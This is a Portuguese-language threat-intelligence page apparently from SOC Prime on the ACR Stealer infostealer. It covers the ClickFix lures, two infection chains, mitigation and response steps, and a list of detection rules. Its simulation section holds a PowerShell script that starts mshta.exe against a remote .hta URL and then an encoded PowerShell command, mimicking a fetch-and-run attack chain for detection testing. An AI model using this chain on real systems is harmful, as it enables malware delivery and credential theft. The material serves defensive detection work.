SOC Prime Bias: High

20 Jul 2026 06:25 UTC

ACR Stealer: Duas Cadeias de Intrusão Observadas Durante Aumento na Atividade de Ameaças

Author Photo
SOC Prime Team linkedin icon Seguir
ACR Stealer: Duas Cadeias de Intrusão Observadas Durante Aumento na Atividade de Ameaças
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

ACR Stealer é uma família de malware de roubo de informações que usa iscas de engenharia social no estilo ClickFix para alvejar ambientes corporativos. O malware opera por meio de duas cadeias de infecção principais: uma que depende de cargas maliciosas entregues via WebDAV com carregadores Python e controle comando e controle baseado em blockchain, e outra que usa MSHTA com entrega de carga útil esteganográfica. Seu objetivo principal é roubar credenciais de navegador, tokens de autenticação e documentos sensíveis.

Investigação

Especialistas do Microsoft Defender observaram um aumento na atividade entre o final de abril e meados de junho de 2026. A investigação identificou dois caminhos de execução distintos: uma campanha baseada em disco envolvendo Python e tarefas agendadas, e uma campanha sem arquivo usando MSHTA e execução de shellcode na memória. Analistas também documentaram métodos avançados de evasão, incluindo timestomping, PowerShell ofuscado e resolutores de deixas mortos apoiados em blockchain.

Mitigação

As organizações devem treinar os usuários para reconhecer prompts do ClickFix e restringir a execução de scripts não confiáveis por meio de controle de aplicativos. Reduzir a exposição a malvertising e impor filtragem web pode ajudar a interromper tentativas de acesso inicial. Reforçar os endpoints limitando a dependência de credenciais armazenadas no navegador e aplicando autenticação multifator também é essencial para reduzir o risco de roubo de credenciais.

Resposta

Se essa atividade for detectada, dispositivos afetados devem ser isolados imediatamente e todas as credenciais e tokens potencialmente comprometidos devem ser rotacionados. Os tokens de sessão devem ser revogados, e os investigadores devem revisar conexões de saída para compartilhamentos remotos suspeitos ou serviços de hospedagem de imagem. O EDR em modo de bloqueio deve ser usado para conter a ameaça e remover artefatos maliciosos de forma eficiente.

Fluxo de Ataque

Detecções

Comportamento Suspeito de Evasão de Defesa LOLBAS MSHTA pela Detecção de Comandos Associados (via process_creation)

Equipe SOC Prime
17 de jul. de 2026

LOLBAS Conhost (via cmdline)

Equipe SOC Prime
17 de jul. de 2026

Tarefa Agendada via Objeto COM (via powershell)

Equipe SOC Prime
17 de jul. de 2026

Possível Descoberta de Informações do Sistema Usando o Módulo Powershell Wmi (via powershell)

Equipe SOC Prime
17 de jul. de 2026

Detecção de PowerShell Ofuscado e Tarefas Agendadas Mascaradas como Atualizações de Software [Windows Powershell]

Regras de IA SOC Prime
17 de jul. de 2026

Detecção de Execução ACR Stealer via Iscas ClickFix [Criação de Processo Windows]

Regras de IA SOC Prime
17 de jul. de 2026

Execução de Simulação

Pré-requisito: O Cheque de Pré-Voo de Telemetria e Linha de Base deve ter passado.

Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstractos ou não relacionados levarão a diagnósticos incorretos.

  • Narrativa do Ataque & Comandos: O adversário visa um usuário com um falso “erro do navegador” (ClickFix). Uma vez que o usuário copia e cola o comando em um terminal, cmd.exe é invocado. O comando instrui mshta.exe a conectar-se a um URL remoto para buscar um script malicioso. Para evadir ainda mais a detecção simples de strings, o script usa powershell.exe com um comando codificado (-Enc) para baixar e executar o malware ACR Stealer na memória, contornando a varredura tradicional baseada em arquivos.

  • Script de Teste de Regressão:

    # Simulação da Cadeia ACR Stealer ClickFix
    # Etapa 1: Simule o wrapper cmd.exe
    # Etapa 2: Invoque mshta.exe com um URL
    # Etapa 3: Seguido por um comando PowerShell codificado
    
    $encodedCommand = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Write-Host 'Simulating ACR Stealer Payload Execution'"))
    
    Start-Process "cmd.exe" -ArgumentList "/c mshta.exe https://example.com/payload.hta & powershell.exe -Enc $encodedCommand"
  • Comandos de Limpeza:

    # Nenhum arquivo persistente é criado nesta simulação, mas certifique-se de que não fiquem processos órfãos
    Stop-Process -Name "mshta" -ErrorAction SilentlyContinue
    Stop-Process -Name "powershell" -ErrorAction SilentlyContinue